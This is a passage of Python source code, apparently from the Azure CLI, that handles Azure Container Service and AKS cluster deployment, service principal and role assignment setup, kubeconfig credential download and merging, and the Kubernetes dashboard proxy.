master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
if validate:
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id='',
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
enable_managed_identity=False,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
# To avoid that windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# The validation for admin_username in ManagedClusterWindowsProfile will fail even if
# users still set windows_admin_username to empty here
except NoTTYException:
raise CLIError('Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not(enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. For now, We just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
if service_principal_profile is None:
logger.warning('The cluster is an MSI cluster, please manually grant '
'Network Contributor role to the system assigned identity '
'after the cluster is created, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity')
else:
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
need_pull_for_result = monitoring or (enable_managed_identity and attach_acr)
if need_pull_for_result:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc))
else:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=custom_headers)
if monitoring:
cloud_name = cmd.cli_ctx.cloud.name
